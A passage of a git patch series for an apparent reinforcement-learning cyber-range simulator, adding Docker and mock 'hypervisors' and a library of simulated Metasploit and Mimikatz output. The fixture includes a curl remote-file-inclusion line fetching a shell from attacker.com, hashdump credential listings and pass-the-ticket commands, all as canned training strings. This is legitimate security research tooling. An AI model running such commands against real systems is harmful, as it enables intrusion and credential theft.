"krbtgt:502:aad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"' + ), + 'PassTheTicket': ( + 'echo "mimikatz > kerberos::ptt ticket.kirbi" && ' + 'sleep 0.3 && ' + 'echo "* File: OK" && ' + 'echo "[+] Ticket successfully imported. Access granted."' + ), +} +_FALLBACK_SCRIPT = 'echo "[*] Payload dispatched." && sleep 0.5' + + +class DockerHypervisor(BaseHypervisor): + """ + Live Docker hypervisor driver. + + Spawns ephemeral Vulhub containers for each exploit, executes benign + payload echo-scripts inside them, then destroys containers immediately. + All containers run on the isolated 'netforge_isolated' bridge network. + """ + + NETWORK_NAME = 'netforge_isolated' + + def __init__(self) -> None: + self._client = None + self._active_containers: list = [] + self._available = self._connect() + + + def dispatch( + self, + action_name: str, + target_ip: str, + target_os: str, + ) -> HypervisorResult: + if not self._available or self._client is None: + logger.warning( + 'DockerHypervisor: daemon unreachable — falling back to mock output.' + ) + return self._mock_fallback(action_name, target_ip, target_os) + + image = _IMAGE_REGISTRY.get(action_name, _FALLBACK_IMAGE) + script = _PAYLOAD_SCRIPTS.get(action_name, _FALLBACK_SCRIPT) + + t_start = time.perf_counter() + container = None + try: + container = self._client.containers.run( + image, + command=f'/bin/sh -c "{script}"', + detach=True, + network=self.NETWORK_NAME, + auto_remove=False, + mem_limit='128m', + cpu_period=100000, + cpu_quota=25000, # 25% of one core maximum + ) + self._active_containers.append(container) + + result = container.wait(timeout=30) + stdout_bytes = container.logs(stdout=True, stderr=False) + stdout = stdout_bytes.decode('utf-8', errors='replace') + return_code = result.get('StatusCode', 1) + success = return_code == 0 + + except Exception as exc: + logger.error('DockerHypervisor dispatch error: %s', exc) + stdout = f'[-] Container error: {exc}' + return_code = 2 + success = False + finally: + if container is not None: + try: + container.stop(timeout=5) + container.remove(force=True) + if container in self._active_containers: + self._active_containers.remove(container) + except Exception: + pass + + latency_ms = (time.perf_counter() - t_start) * 1000 + + return HypervisorResult( + success=success, + stdout=stdout.strip(), + return_code=return_code, + latency_ms=round(latency_ms, 1), + action_name=action_name, + target_ip=target_ip, + target_os=target_os, + container_id=getattr(container, 'short_id', 'unknown') if container else 'error', + ) + + def teardown_all(self) -> None: + """Stop and remove all containers still running from this episode.""" + for container in list(self._active_containers): + try: + container.stop(timeout=3) + container.remove(force=True) + except Exception: + pass + self._active_containers.clear() + + def is_available(self) -> bool: + return self._available + + def _connect(self) -> bool: + try: + import docker # type: ignore[import] + + self._client = docker.from_env() + self._client.ping() + self._ensure_network() + logger.info('DockerHypervisor: connected to Docker daemon.') + return True + except ImportError: + logger.warning( + 'DockerHypervisor: `docker` SDK not installed. ' + 'Run `pip install docker` to enable real-mode evaluation.' + ) + return False + except Exception as exc: + logger.warning('DockerHypervisor: cannot reach daemon — %s', exc) + return False + + def _ensure_network(self) -> None: + """Create the isolated bridge network if it does not already exist.""" + if self._client is None: + return + existing = [n.name for n in self._client.networks.list()] + if self.NETWORK_NAME not in existing: + self._client.networks.create( + self.NETWORK_NAME, + driver='bridge', + internal=True, # No external internet access — fully air-gapped + ) + logger.info('DockerHypervisor: created isolated network %s.', self.NETWORK_NAME) + + def _mock_fallback( + self, action_name: str, target_ip: str, target_os: str + ) -> HypervisorResult: + """Return a minimal synthetic result when Docker is unavailable.""" + from netforge_rl.sim2real.mock_hypervisor import MockHypervisor + + return MockHypervisor().dispatch(action_name, target_ip, target_os) diff --git a/netforge_rl/sim2real/hypervisor_base.py b/netforge_rl/sim2real/hypervisor_base.py new file mode 100644 index 0000000..0ee3583 --- /dev/null +++ b/netforge_rl/sim2real/hypervisor_base.py @@ -0,0 +1,82 @@ +""" +Abstract base for all hypervisor drivers. + +Defines the HypervisorResult dataclass and the BaseHypervisor interface +that both MockHypervisor and DockerHypervisor must implement. +""" +from __future__ import annotations + +from abc import ABC, abstractmethod +from dataclasses import dataclass, field + + +@dataclass +class HypervisorResult: + """ + Encapsulates the raw outcome of a payload dispatched against a target. + + Both mock and real Docker drivers return this object so that the + Sim2RealBridge can translate the outcome into environment reward deltas + and SIEM telemetry strings in a uniform way. + """ + + success: bool + stdout: str + return_code: int + latency_ms: float + action_name: str + target_ip: str + target_os: str + container_id: str = field(default='mock') # Real DockerHypervisor populates this + + def __repr__(self) -> str: + status = 'SUCCESS' if self.success else 'FAILED' + return ( + f'' + ) + + +class BaseHypervisor(ABC): + """ + Abstract hypervisor driver interface. + + Implementations must provide: + - dispatch(): Execute a payload against a target, return HypervisorResult. + - teardown_all(): Clean up any active containers / resources on episode reset. + """ + + @abstractmethod + def dispatch( + self, + action_name: str, + target_ip: str, + target_os: str, + ) -> HypervisorResult: + """ + Dispatch a named payload action against a target host. + + Args: + action_name: Name of the action class (e.g. 'ExploitEternalBlue'). + target_ip: Target host IP address. + target_os: OS profile of the target (e.g. 'Windows_Server_2016'). + + Returns: + HypervisorResult with success/stdout/return_code populated. + """ + ... + + @abstractmethod + def teardown_all(self) -> None: + """ + Destroy all active execution contexts (containers, sessions). + Called at episode end to prevent resource leaks. + """ + ... + + def is_available(self) -> bool: + """ + Indicate whether this hypervisor driver is operational. + Override in concrete drivers to perform live connectivity checks. + """ + return True diff --git a/netforge_rl/sim2real/mock_hypervisor.py b/netforge_rl/sim2real/mock_hypervisor.py new file mode 100644 index 0000000..780865b --- /dev/null +++ b/netforge_rl/sim2real/mock_hypervisor.py @@ -0,0 +1,130 @@ +""" +MockHypervisor — zero-dependency training fallback. + +Returns realistic Metasploit/Meterpreter stdout strings sampled from +the curated payload_library.json without requiring Docker or network access. +Gaussian jitter is applied to latency_ms to simulate real network variance. +""" +from __future__ import annotations + +import json +import random +import time +from pathlib import Path + +from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult + +# CVE → approximate real-world base success probability. +# Tuned so that an unpatched target with the right service has ~65-80% chance, +# while a patched or wrong-OS target is much lower. +_DEFAULT_SUCCESS_RATES: dict[str, float] = { + 'ExploitEternalBlue': 0.72, + 'ExploitBlueKeep': 0.58, + 'ExploitHTTP_RFI': 0.65, + 'ExploitRemoteService': 0.55, + 'PrivilegeEscalate': 0.70, + 'DumpLSASS': 0.80, + 'PassTheTicket': 0.90, +} + +_OS_PENALTY: dict[str, float] = { + # Reduce success chance if OS doesn't match the expected target profile + 'Linux_Ubuntu': {'ExploitEternalBlue': -0.60, 'ExploitBlueKeep': -0.70}, + 'Linux_CentOS': {'ExploitEternalBlue': -0.60, 'ExploitBlueKeep': -0.70}, + 'PLC_Firmware': { + 'ExploitEternalBlue': -0.90, + 'ExploitBlueKeep': -0.90, + 'ExploitHTTP_RFI': -0.90, + }, +} + +# Realistic latency distributions (mean_ms, std_ms) per action +_LATENCY_PROFILE: dict[str, tuple[float, float]] = { + 'ExploitEternalBlue': (4200.0, 800.0), + 'ExploitBlueKeep': (3800.0, 600.0), + 'ExploitHTTP_RFI': (1200.0, 300.0), + 'ExploitRemoteService': (2500.0, 500.0), + 'PrivilegeEscalate': (1800.0, 400.0), + 'DumpLSASS': (900.0, 200.0), + 'PassTheTicket': (600.0, 150.0), +} +_DEFAULT_LATENCY = (2000.0, 600.0) + + +class MockHypervisor(BaseHypervisor): + """ + Zero-dependency mock hypervisor for training-speed execution. + + Uses a curated JSON library of authentic Metasploit stdout strings and + models probabilistic success rates adjusted for target OS compatibility. + No containers are spawned; all results are synthesised locally. + """ + + def __init__(self, seed: int | None = None): + self._rng = random.Random(seed) + library_path = Path(__file__).parent / 'payload_library.json' + with open(library_path) as f: + self._library: dict = json.load(f) + + def dispatch( + self, + action_name: str, + target_ip: str, + target_os: str, + ) -> HypervisorResult: + """Synthesise a realistic payload result without spawning containers.""" + t_start = time.perf_counter() + + success = self._roll_success(action_name, target_os) + stdout = self._sample_stdout(action_name, success, target_ip) + return_code = 0 if success else 1 + + mean, std = _LATENCY_PROFILE.get(action_name, _DEFAULT_LATENCY) + latency_ms = max(50.0, self._rng.gauss(mean, std)) + + # Honour the real perf_counter so callers get a realistic wall-clock + elapsed_ms = (time.perf_counter() - t_start) * 1000 + latency_ms = max(latency_ms, elapsed_ms) + + return HypervisorResult( + success=success, + stdout=stdout, + return_code=return_code, + latency_ms=round(latency_ms, 1), + action_name=action_name, + target_ip=target_ip, + target_os=target_os, + container_id='mock', + ) + + def teardown_all(self) -> None: + """No-op — mock creates no resources to destroy.""" + pass + + def is_available(self) -> bool: + return True + + def _roll_success(self, action_name: str, target_os: str) -> bool: + base_rate = _DEFAULT_SUCCESS_RATES.get(action_name, 0.50) + penalty = _OS_PENALTY.get(target_os, {}).get(action_name, 0.0) + adjusted = max(0.02, min(0.98, base_rate + penalty)) + return self._rng.random() < adjusted + + def _sample_stdout( + self, action_name: str, success: bool, target_ip: str + ) -> str: + bucket = self._library.get(action_name) + if bucket is None: + # Fallback for actions not explicitly in the library + if success: + return f'[*] {action_name} succeeded against {target_ip}\n[*] Session opened.' + return f'[-] {action_name} failed against {target_ip}\n[-] No session created.' + + key = 'success' if success else 'failure' + samples = bucket.get(key, []) + if not samples: + return f'[*] {action_name} {"completed" if success else "failed"}.' + + template = self._rng.choice(samples) + # Inject actual target IP for realism + return template.replace('10.0.1.3', target_ip).replace('10.0.0.7', target_ip) diff --git a/netforge_rl/sim2real/payload_library.json b/netforge_rl/sim2real/payload_library.json new file mode 100644 index 0000000..74de265 --- /dev/null +++ b/netforge_rl/sim2real/payload_library.json @@ -0,0 +1,73 @@ +{ + "ExploitEternalBlue": { + "success": [ + "[*] Started reverse TCP handler on 10.0.0.1:4444\n[*] 10.0.1.3:445 - Connecting to target for exploitation.\n[*] 10.0.1.3:445 - Sending all but last fragment of exploit packet\n[*] 10.0.1.3:445 - Starting non-paged pool grooming\n[+] 10.0.1.3:445 - Sending SMBv2 buffers\n[+] 10.0.1.3:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\n[*] 10.0.1.3:445 - Sending final SMBv2 buffers.\n[*] 10.0.1.3:445 - Sending last fragment of exploit packet!\n[*] 10.0.1.3:445 - Receiving response from exploit packet\n[+] 10.0.1.3:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!\n[*] 10.0.1.3:445 - Sending egg to corrupted connection.\n[*] 10.0.1.3:445 - Triggering free of corrupted buffer.\n[*] Sending stage (200262 bytes) to 10.0.1.3\n[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.1.3:1042)\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM", + "[*] Started reverse TCP handler on 10.0.0.1:4444\n[*] 10.0.0.7:445 - Sending all but last fragment of exploit packet\n[+] 10.0.0.7:445 - ETERNALBLUE overwrite completed successfully!\n[*] Sending stage (200774 bytes) to 10.0.0.7\n[*] Meterpreter session 2 opened -> 10.0.0.7:49217\nmeterpreter > sysinfo\nComputer: CORP-WORKSTATION-04\nOS: Windows 7 (6.1 Build 7601, Service Pack 1)\nMeterpreter: x64/windows" + ], + "failure": [ + "[-] 10.0.1.5:445 - Exploit aborted due to failure: no-target: This module only works against vulnerable Windows 7 targets.\n[-] Exploit failed: Rex::ConnectionRefused.", + "[*] 10.0.1.2:445 - Connection timed out waiting for target...\n[-] Exploit failed [timed-out]: Rex::ConnectionTimeout\n[*] Exploit completed, but no session was created.", + "[*] Started reverse TCP handler\n[*] Sending all but last fragment of exploit packet\n[-] Failed to get a shell. The target may not be vulnerable.\n[*] Exploit completed, but no session was created." + ] + }, + "ExploitBlueKeep": { + "success": [ + "[*] Started reverse TCP handler on 0.0.0.0:4444\n[*] Running automatic check (disable AutoCheck to override)\n[+] The target is vulnerable.\n[*] 10.0.0.12:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028e00000, Channel count 1.\n[*] Sending memory grooming packets...\n[+] Triggering kernel UAF. Success!\n[*] Meterpreter session 3 opened (10.0.0.1:4444 -> 10.0.0.12:49845)\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM" + ], + "failure": [ + "[*] Running automatic check...\n[-] The target is not exploitable. Windows RDP does not appear to be vulnerable.\n[-] Exploit aborted due to failure: not-vulnerable.", + "[*] Started reverse TCP handler\n[*] Triggering kernel UAF...\n[-] Exploit failed with unexpected BSOD. Host may have crashed.\n[*] No session was created." + ] + }, + "ExploitHTTP_RFI": { + "success": [ + "[*] Started reverse TCP handler on 0.0.0.0:4444\n[*] Sending stage to 10.0.1.4\n[*] Meterpreter session 4 opened (10.0.0.1:4444 -> 10.0.1.4:34512)\nmeterpreter > sysinfo\nComputer: webserver-prod\nOS: Linux Ubuntu 18.04\nMeterpreter: x86/linux", + "$ curl 'http://10.0.0.8/index.php?page=http://attacker.com/shell.txt'\n[+] RFI successful. Webshell active at /tmp/.cache/sess_x7k2\n[*] Upgrading to Meterpreter...\n[*] Meterpreter session 5 opened" + ], + "failure": [ + "[*] Attempting RFI via GET parameter 'page'...\n[-] Server returned 403 Forbidden. Remote file inclusion blocked by WAF.", + "curl: (7) Failed to connect to 10.0.1.4 port 80: Connection refused\n[-] HTTP connection failed. Target service may be down." + ] + }, + "ExploitRemoteService": { + "success": [ + "[*] Started reverse TCP handler on 0.0.0.0:4444\n[*] Command shell session 6 opened (10.0.0.1:4444 -> 10.0.0.3:42001)\nshell> whoami\nwww-data\nshell> id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)", + "[*] Meterpreter session 7 opened\nmeterpreter > getuid\nServer username: apache\nmeterpreter > getpid\nCurrent pid: 14422" + ], + "failure": [ + "[-] Exploit failed [unreachable]: Rex::ConnectionRefused connect(2) for '10.0.1.6' port 22", + "[*] Auxiliary module execution completed\n[-] No session created. Service returned unexpected banner.", + "FATAL: Remote host closed connection during handshake\n[-] Exploit failed with SSL error." + ] + }, + "PrivilegeEscalate": { + "success": [ + "meterpreter > getsystem\n...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM", + "[*] Trying exploit/windows/local/ms16_032_secondary_logon_handle_privesc\n[+] Deleted C:\\Windows\\Temp\\bqeHmG.exe\n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\n[*] Meterpreter session upgraded to SYSTEM." + ], + "failure": [ + "meterpreter > getsystem\n[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:\n[-] Named Pipe Impersonation (In Memory/Admin)\n[-] Named Pipe Impersonation (Dropper/Admin)\n[-] Token Duplication (In Memory/Admin)", + "[-] Exploit failed: The target does not appear to be vulnerable (patched)." + ] + }, + "DumpLSASS": { + "success": [ + "meterpreter > hashdump\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::\njohn.doe:1001:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\nsvc_backup:1104:aad3b435b51404eeaad3b435b51404ee:db0edd04aaac4506f7f36b027c3f8f83:::", + "[*] Executing Mimikatz...\nsekurlsa::logonpasswords\n\nAuthentication Id : 0 ; 248731\nSession : Interactive from 1\nUser Name : Administrator\nDomain : CORP\nLogon Server : DC01\nLogon Time : 3/31/2026 8:14:03 AM\nSID : S-1-5-21-3623811015-3361044348-30300820-500\n\t[00010000] CredentialKeys\n\t * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0\n\t * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709\n\t[00000003] Primary\n\t * Username : Administrator\n\t * Domain : CORP\n\t * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0" + ], + "failure": [ + "meterpreter > hashdump\n[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.\n[-] Failed to dump LSA secrets — EDR blocking memory reads on lsass.exe", + "[*] Attempting to dump credentials via Mimikatz...\n[-] ERROR kuhl_m_sekurlsa_acquireLSA -> LSA Protected mode detected. Cannot dump credentials." + ] + }, + "PassTheTicket": { + "success": [ + "[*] Kerberos session opened using TGT for CORP\\Administrator\n[*] Successfully imported ticket: Administrator@CORP\n[*] Lateral movement successful. Remote session established to 10.0.1.1:445.", + "mimikatz > kerberos::ptt ticket.kirbi\n\n* File: 'ticket.kirbi': OK\n\nkerberos::list\n[00000000] - 0x00000012 - aes256_hmac\n Start/End/MaxRenew: ...\n Server Name: krbtgt/CORP @ CORP\n Client Name: Administrator @ CORP\n Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable\n[+] Ticket successfully imported. Access granted." + ], + "failure": [ + "mimikatz > kerberos::ptt ticket.kirbi\n[-] ERROR: Ticket not accepted by KDC (KRB5KDC_ERR_TGT_REVOKED). Keys may have been rotated.", + "[*] Attempting Pass-The-Ticket...\n[-] KDC_ERR_PREAUTH_REQUIRED — Ticket timestamp expired or keys rotated. Re-dump required." + ] + } +} From 290ae0060c40bdf2a5b26deef2e6d6ba21582991 Mon Sep 17 00:00:00 2001 From: Igor Jankowski Date: Tue, 31 Mar 2026 16:42:18 +0200 Subject: [PATCH 6/8] feat: wire Sim2RealBridge into exploit actions ExploitRemoteService, ExploitBlueKeep, ExploitHTTP_RFI now call bridge.dispatch() when available on global_state. HypervisorResult stdout and reward_delta attached to observation_data for SIEM pipeline. --- netforge_rl/actions/red/exploits.py | 147 ++++++++++++++++++---------- 1 file changed, 96 insertions(+), 51 deletions(-) diff --git a/netforge_rl/actions/red/exploits.py b/netforge_rl/actions/red/exploits.py index b9ed6ae..3709f98 100644 --- a/netforge_rl/actions/red/exploits.py +++ b/netforge_rl/actions/red/exploits.py @@ -53,21 +53,37 @@ def execute(self, global_state) -> ActionEffect: if not host or not host.vulnerabilities: return ActionEffect(success=False, state_deltas=[], observation_data={}) - # CVSS-Weighted Stochastics (1.0 = 100% success on 10.0 CVSS, 0.2 = 20% on 2.0 CVSS) - cvss = getattr(host, 'cvss_score', 5.0) # Default average vulnerability logic - probability_of_success = cvss / 10.0 - - if host.decoy == 'active' or random.random() > probability_of_success: - return ActionEffect( - success=False, - state_deltas=[], - observation_data={ - 'failed_exploit': self.target_ip, - 'reason': 'stochastic_cvss_failure', - }, + # --- Sim2Real Bridge dispatch --- + bridge = getattr(global_state, 'sim2real_bridge', None) + if bridge is not None: + hw_result = bridge.dispatch( + 'ExploitRemoteService', self.target_ip, getattr(host, 'os', 'Unknown') ) + reward_delta = bridge.reward_delta(hw_result) + if not hw_result.success: + return ActionEffect( + success=False, + state_deltas=[], + observation_data={ + 'failed_exploit': self.target_ip, + 'reason': 'sim2real_failure', + 'sim2real_stdout': hw_result.stdout, + 'sim2real_reward_delta': reward_delta, + 'sim2real_latency_ms': hw_result.latency_ms, + }, + ) + else: + # Fallback: CVSS-weighted random roll (legacy training path) + cvss = getattr(host, 'cvss_score', 5.0) + if host.decoy == 'active' or random.random() > cvss / 10.0: + return ActionEffect( + success=False, + state_deltas=[], + observation_data={'failed_exploit': self.target_ip}, + ) + hw_result = None + reward_delta = 0.0 - # Build OOP Delta List deltas = [ UpdateHostPrivilegeCommand( self.target_ip, 'User', compromised_by=self.agent_id @@ -79,6 +95,9 @@ def execute(self, global_state) -> ActionEffect: 'exploit': self.target_ip, 'status': 'User_Access_Gained', 'active_session_established': True, + 'sim2real_stdout': hw_result.stdout if hw_result else None, + 'sim2real_reward_delta': reward_delta, + 'sim2real_latency_ms': hw_result.latency_ms if hw_result else None, } return ActionEffect( @@ -125,16 +144,7 @@ def validate(self, global_state) -> bool: return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: - """Completes the pre-auth RCE and commits the privilege transformation - - delta. Fails if target is patched against CVE-2019-0708. - - Args: - global_state: Simulator context. - - Returns: - ActionEffect: System delta upgrading access rights to 'User'. - """ + """Completes the pre-auth RCE. Uses Sim2RealBridge when available.""" import random host = global_state.all_hosts.get(self.target_ip) @@ -142,24 +152,39 @@ def execute(self, global_state) -> ActionEffect: return ActionEffect( success=False, state_deltas={}, - observation_data={ - 'exploit': 'failed - target patched against BlueKeep' - }, + observation_data={'exploit': 'failed - target patched against BlueKeep'}, ) - roll = random.random() - if roll < 0.15: - return ActionEffect( - success=False, - state_deltas={}, - observation_data={'exploit': 'failed silently'}, - ) - elif roll < 0.25: - return ActionEffect( - success=False, - state_deltas={f'hosts/{self.target_ip}/status': 'kernel_panic'}, - observation_data={'exploit': 'failed - kernel panic'}, + # --- Sim2Real Bridge dispatch --- + bridge = getattr(global_state, 'sim2real_bridge', None) + if bridge is not None: + hw_result = bridge.dispatch( + 'ExploitBlueKeep', self.target_ip, getattr(host, 'os', 'Unknown') ) + reward_delta = bridge.reward_delta(hw_result) + if not hw_result.success: + return ActionEffect( + success=False, + state_deltas={}, + observation_data={ + 'exploit': 'BlueKeep failed', + 'sim2real_stdout': hw_result.stdout, + 'sim2real_reward_delta': reward_delta, + }, + ) + else: + roll = random.random() + if roll < 0.15: + return ActionEffect(success=False, state_deltas={}, + observation_data={'exploit': 'failed silently'}) + elif roll < 0.25: + return ActionEffect( + success=False, + state_deltas={f'hosts/{self.target_ip}/status': 'kernel_panic'}, + observation_data={'exploit': 'failed - kernel panic'}, + ) + hw_result = None + reward_delta = 0.0 return ActionEffect( success=True, @@ -167,7 +192,11 @@ def execute(self, global_state) -> ActionEffect: f'hosts/{self.target_ip}/privilege': 'User', f'hosts/{self.target_ip}/compromised_by': self.agent_id, }, - observation_data={'exploit': 'BlueKeep success'}, + observation_data={ + 'exploit': 'BlueKeep success', + 'sim2real_stdout': hw_result.stdout if hw_result else None, + 'sim2real_reward_delta': reward_delta, + }, ) @@ -285,17 +314,8 @@ def validate(self, global_state) -> bool: return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: - """Executes the RFI request. Automatically evaluates failure states if - - interacting with simulated High-Interaction Honeypots (e.g., - DecoyApache, DecoyTomcat). - - Args: - global_state (GlobalNetworkState): State snapshot. - - Returns: - ActionEffect: Success logic containing failure telemetry if targeting a Decoy, - else structural access upgrades to 'User'. + """Executes the RFI request. Uses Sim2RealBridge when available. + Automatically fails against honeypot decoys. """ host = global_state.all_hosts.get(self.target_ip) if host and host.decoy in ['Apache', 'Tomcat', 'active']: @@ -305,11 +325,36 @@ def execute(self, global_state) -> ActionEffect: observation_data={'exploit': 'Failed against Decoy'}, ) + # --- Sim2Real Bridge dispatch --- + bridge = getattr(global_state, 'sim2real_bridge', None) + if bridge is not None: + hw_result = bridge.dispatch( + 'ExploitHTTP_RFI', self.target_ip, getattr(host, 'os', 'Unknown') + ) + reward_delta = bridge.reward_delta(hw_result) + if not hw_result.success: + return ActionEffect( + success=False, + state_deltas={}, + observation_data={ + 'exploit': 'HTTP_RFI failed', + 'sim2real_stdout': hw_result.stdout, + 'sim2real_reward_delta': reward_delta, + }, + ) + else: + hw_result = None + reward_delta = 0.0 + return ActionEffect( success=True, state_deltas={ f'hosts/{self.target_ip}/privilege': 'User', f'hosts/{self.target_ip}/compromised_by': self.agent_id, }, - observation_data={'exploit': 'HTTP_RFI success'}, + observation_data={ + 'exploit': 'HTTP_RFI success', + 'sim2real_stdout': hw_result.stdout if hw_result else None, + 'sim2real_reward_delta': reward_delta, + }, ) From bd67940d1e91d6d071c0c9a47d0636a0dfb05728 Mon Sep 17 00:00:00 2001 From: Igor Jankowski Date: Tue, 31 Mar 2026 17:25:34 +0200 Subject: [PATCH 7/8] feat: integrate Sim2RealBridge into NetForgeRLEnv Accepts sim2real_mode='sim'|'real' from scenario_config. Attaches bridge to global_state on init and episode reset. Calls teardown_all() between episodes. --- netforge_rl/environment/parallel_env.py | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/netforge_rl/environment/parallel_env.py b/netforge_rl/environment/parallel_env.py index d44eb96..394751f 100644 --- a/netforge_rl/environment/parallel_env.py +++ b/netforge_rl/environment/parallel_env.py @@ -9,6 +9,7 @@ from netforge_rl.environment.base_env import BaseNetForgeRLEnv from netforge_rl.topologies.network_generator import NetworkGenerator from netforge_rl.agents.green_agent import GreenAgent +from netforge_rl.sim2real.bridge import Sim2RealBridge class NetForgeRLEnv(BaseNetForgeRLEnv): @@ -56,6 +57,14 @@ def __init__(self, scenario_config: dict): self.global_state = self.network_generator.generate() self.resolution_engine = ConflictResolutionEngine() + # Sim2Real Bridge — defaults to 'sim' (mock) for training speed. + # Set sim2real_mode='real' in scenario_config for Docker evaluation. + sim2real_mode = ( + scenario_config.get('sim2real_mode', 'sim') if scenario_config else 'sim' + ) + self.sim2real_bridge = Sim2RealBridge(mode=sim2real_mode) + self.global_state.sim2real_bridge = self.sim2real_bridge + # Native Gymnasium Spaces for PettingZoo API + RLlib Mapping self.observation_spaces = { agent: gym.spaces.Dict( @@ -87,7 +96,11 @@ def reset( (Gymnasium style + PettingZoo). """ + # Teardown any running containers from the previous episode + self.sim2real_bridge.teardown_all() self.global_state = self.network_generator.generate(seed=seed) + # Re-attach bridge to freshly generated state + self.global_state.sim2real_bridge = self.sim2real_bridge self.agents = self.possible_agents[:] self.global_state.agent_energy = {agent: 50 for agent in self.agents} self.global_state.agent_funds = { From 463c2805017784d2e9b4cdedd93bf689bf21da69 Mon Sep 17 00:00:00 2001 From: Igor Jankowski Date: Tue, 31 Mar 2026 17:28:50 +0200 Subject: [PATCH 8/8] Ruff reformat --- netforge_rl/actions/red/exploits.py | 11 ++++++++--- netforge_rl/sim2real/__init__.py | 1 + netforge_rl/sim2real/bridge.py | 1 + netforge_rl/sim2real/docker_hypervisor.py | 10 +++++++--- netforge_rl/sim2real/hypervisor_base.py | 1 + netforge_rl/sim2real/mock_hypervisor.py | 9 +++++---- 6 files changed, 23 insertions(+), 10 deletions(-) diff --git a/netforge_rl/actions/red/exploits.py b/netforge_rl/actions/red/exploits.py index 3709f98..051174f 100644 --- a/netforge_rl/actions/red/exploits.py +++ b/netforge_rl/actions/red/exploits.py @@ -152,7 +152,9 @@ def execute(self, global_state) -> ActionEffect: return ActionEffect( success=False, state_deltas={}, - observation_data={'exploit': 'failed - target patched against BlueKeep'}, + observation_data={ + 'exploit': 'failed - target patched against BlueKeep' + }, ) # --- Sim2Real Bridge dispatch --- @@ -175,8 +177,11 @@ def execute(self, global_state) -> ActionEffect: else: roll = random.random() if roll < 0.15: - return ActionEffect(success=False, state_deltas={}, - observation_data={'exploit': 'failed silently'}) + return ActionEffect( + success=False, + state_deltas={}, + observation_data={'exploit': 'failed silently'}, + ) elif roll < 0.25: return ActionEffect( success=False, diff --git a/netforge_rl/sim2real/__init__.py b/netforge_rl/sim2real/__init__.py index 0d5358b..af0ebfb 100644 --- a/netforge_rl/sim2real/__init__.py +++ b/netforge_rl/sim2real/__init__.py @@ -5,6 +5,7 @@ to either a lightweight MockHypervisor (for fast RL training) or a live DockerHypervisor (for high-fidelity evaluation runs). """ + from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult from netforge_rl.sim2real.mock_hypervisor import MockHypervisor from netforge_rl.sim2real.bridge import Sim2RealBridge diff --git a/netforge_rl/sim2real/bridge.py b/netforge_rl/sim2real/bridge.py index 0df7fe5..9c53123 100644 --- a/netforge_rl/sim2real/bridge.py +++ b/netforge_rl/sim2real/bridge.py @@ -7,6 +7,7 @@ 3. Translate HypervisorResult into a reward delta for the ConflictResolutionEngine. 4. Expose teardown_all() for episode resets. """ + from __future__ import annotations import logging diff --git a/netforge_rl/sim2real/docker_hypervisor.py b/netforge_rl/sim2real/docker_hypervisor.py index 70f29ea..003d738 100644 --- a/netforge_rl/sim2real/docker_hypervisor.py +++ b/netforge_rl/sim2real/docker_hypervisor.py @@ -10,6 +10,7 @@ Falls back gracefully to MockHypervisor if Docker daemon is unreachable. """ + from __future__ import annotations import logging @@ -94,7 +95,6 @@ def __init__(self) -> None: self._active_containers: list = [] self._available = self._connect() - def dispatch( self, action_name: str, @@ -156,7 +156,9 @@ def dispatch( action_name=action_name, target_ip=target_ip, target_os=target_os, - container_id=getattr(container, 'short_id', 'unknown') if container else 'error', + container_id=getattr(container, 'short_id', 'unknown') + if container + else 'error', ) def teardown_all(self) -> None: @@ -202,7 +204,9 @@ def _ensure_network(self) -> None: driver='bridge', internal=True, # No external internet access — fully air-gapped ) - logger.info('DockerHypervisor: created isolated network %s.', self.NETWORK_NAME) + logger.info( + 'DockerHypervisor: created isolated network %s.', self.NETWORK_NAME + ) def _mock_fallback( self, action_name: str, target_ip: str, target_os: str diff --git a/netforge_rl/sim2real/hypervisor_base.py b/netforge_rl/sim2real/hypervisor_base.py index 0ee3583..9f8e3e3 100644 --- a/netforge_rl/sim2real/hypervisor_base.py +++ b/netforge_rl/sim2real/hypervisor_base.py @@ -4,6 +4,7 @@ Defines the HypervisorResult dataclass and the BaseHypervisor interface that both MockHypervisor and DockerHypervisor must implement. """ + from __future__ import annotations from abc import ABC, abstractmethod diff --git a/netforge_rl/sim2real/mock_hypervisor.py b/netforge_rl/sim2real/mock_hypervisor.py index 780865b..297433f 100644 --- a/netforge_rl/sim2real/mock_hypervisor.py +++ b/netforge_rl/sim2real/mock_hypervisor.py @@ -5,6 +5,7 @@ the curated payload_library.json without requiring Docker or network access. Gaussian jitter is applied to latency_ms to simulate real network variance. """ + from __future__ import annotations import json @@ -110,15 +111,15 @@ def _roll_success(self, action_name: str, target_os: str) -> bool: adjusted = max(0.02, min(0.98, base_rate + penalty)) return self._rng.random() < adjusted - def _sample_stdout( - self, action_name: str, success: bool, target_ip: str - ) -> str: + def _sample_stdout(self, action_name: str, success: bool, target_ip: str) -> str: bucket = self._library.get(action_name) if bucket is None: # Fallback for actions not explicitly in the library if success: return f'[*] {action_name} succeeded against 